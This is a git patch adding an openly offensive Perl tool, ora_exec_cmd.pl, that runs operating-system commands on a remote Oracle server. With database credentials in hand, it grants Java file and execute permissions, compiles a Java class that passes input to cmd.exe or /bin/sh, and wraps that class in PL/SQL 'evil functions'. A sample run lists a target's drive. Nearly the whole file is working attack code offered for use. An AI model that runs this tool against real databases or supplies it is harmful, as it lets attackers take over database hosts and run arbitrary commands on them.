From c95bae8ed4de0ada4ac5135103664b1f5529d84d Mon Sep 17 00:00:00 2001 From: 0c0c0f <892850447@qq.com> Date: Fri, 23 Dec 2016 15:24:40 +0800 Subject: [PATCH] Create ora_exec_cmd.pl https://github.com/bunk3r/ora-exec-cmd --- service/ora_exec_cmd.pl | 192 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 192 insertions(+) create mode 100644 service/ora_exec_cmd.pl diff --git a/service/ora_exec_cmd.pl b/service/ora_exec_cmd.pl new file mode 100644 index 0000000..22c1518 --- /dev/null +++ b/service/ora_exec_cmd.pl @@ -0,0 +1,192 @@ +#!/usr/bin/perl +# +# Execute remote operating system commands from Oracle connection +# +# Author: +# Andrea "bunker" Purificato +# http://www.purificato.org +# +# Updated on Wed Mar 7 10:24:58 CET 2007 +# +# Oracle InstantClient (basic + sdk) required for DBD::Oracle +# +# +# $ perl ora_exec_cmd.pl -h 192.168.97.187 -s prova -u sfigato -p password -c 'dir c:\' +# [-] Setting permissions... +# [-] Creating Java class... +# [-] Creating function... +# [-] Creating procedure... +# [-] Exec: (dir c:\) +# Volume in drive C is Stub +# Volume Serial Number is 809D-4AC5 +# +# Directory of c:\ +# Process out: +# 2007-01-24 11.27 1 024 .rnd +# 2006-09-29 17.04 0 AUTOEXEC.BAT +# 2006-09-29 17.04 0 CONFIG.SYS +# 2006-11-14 10.05 cygwin +# 2006-09-29 17.10 Documents and Settings +# 2006-12-05 12.27 126 nessuswx.dbg +# 2007-02-07 17.06 0 netstat.txt +# 2006-10-27 14.47 Oracle +# 2007-02-05 16.02 Program Files +# 2007-02-07 09.41 WINDOWS +# 2006-10-27 09.52 Xindice +# 6 File(s) 1 150 bytes +# 6 Dir(s) 7 859 896 320 bytes free +# +use warnings; +use strict; +use DBI; +use Getopt::Std; +use vars qw/ %opt /; + +sub usage { + print <<"USAGE"; + +Syntax: $0 -h -s -u -p [-P ] [-b] -c '' +Options: + -h target server address + -s target sid name + -u username + -p password + + [-P Oracle port] + [-b bypass creation of evil functions] + -c command + +USAGE + exit 0 +} + +my $opt_string = 'h:s:u:p:c:P:b'; +getopts($opt_string, \%opt) or &usage; +&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} or !$opt{c}); + +my $user = uc $opt{u}; + +my $dbh = undef; +if ($opt{P}) { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die; +} else { + $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die; +} + +$dbh->{RaiseError} = 1; +$dbh->func( 1000000, 'dbms_output_enable' ); + +unless($opt{b}) { + print "[-] Setting permissions...\n"; + my $sth = $dbh->prepare(" + BEGIN + dbms_java.grant_Permission('$user', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); + dbms_java.grant_Permission('$user', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); + dbms_java.grant_Permission('$user', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); + END; + "); + $sth->execute; + + print "[-] Creating Java class...\n"; + $sth = $dbh->prepare(' + create or replace and compile java source named "Util" as + import java.io.*; + public class Util { + public static void runthis(String command) { + try { + String[] fCmd; + if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) { + fCmd = new String[3]; + fCmd[0] = "C:\\\\windows\\\\system32\\\\cmd.exe"; // XP/2003 + //fCmd[0] = "C:\\\\winnt\\\\system32\\\\cmd.exe"; // NT/2000 + fCmd[1] = "/c"; + fCmd[2] = command; + } + else { + fCmd = new String[3]; + fCmd[0] = "/bin/sh"; + fCmd[1] = "-c"; + fCmd[2] = command; + } + final Process pr = Runtime.getRuntime().exec(fCmd); + pr.waitFor(); + new Thread(new Runnable(){ + public void run() { + BufferedReader br_in = null; + try { + br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); + String buff = null; + while ((buff = br_in.readLine()) != null) { + System.out.println(buff); + try {Thread.sleep(100); } catch(Exception e) {} + } + br_in.close(); + } + catch (IOException ioe) { + System.out.println("Exception caught printing process output."); + ioe.printStackTrace(); + } + finally { try { br_in.close(); } catch (Exception ex) {} } + } + }).start(); + new Thread(new Runnable(){ + public void run() { + BufferedReader br_err = null; + try { + br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); + String buff = null; + while ((buff = br_err.readLine()) != null) { + System.out.println("Error: " + buff); + try {Thread.sleep(100); } catch(Exception e) {} + } + br_err.close(); + } + catch (IOException ioe) { + System.out.println("Exception caught printing process error."); + ioe.printStackTrace(); + } + finally { try { br_err.close(); } catch (Exception ex) {} } + } + }).start(); + } + catch (Exception ex) { + System.out.println(ex.getLocalizedMessage()); + } + } + }; + '); + $sth->execute; + + print "[-] Creating function...\n"; + $sth = $dbh->prepare(q{ + create or replace function run_cmd( p_cmd in varchar2) return number as + language java + name 'Util.runthis(java.lang.String) return integer'; + }); + $sth->execute; + + print "[-] Creating procedure...\n"; + $dbh->do(' + create or replace procedure rc(p_cmd in varchar2) as + x number; + begin + x := run_cmd(p_cmd); + end;'); +} + +print "[-] Exec: ($opt{c})\n"; +my $sth = $dbh->prepare(qq{ +begin + DBMS_JAVA.SET_OUTPUT(1000000); + rc('$opt{c}'); +end; +}); +$sth->execute; + +while (my $line = $dbh->func( 'dbms_output_get' )) { + print "$line\n"; +} + +$sth->finish; +$dbh->disconnect; +exit;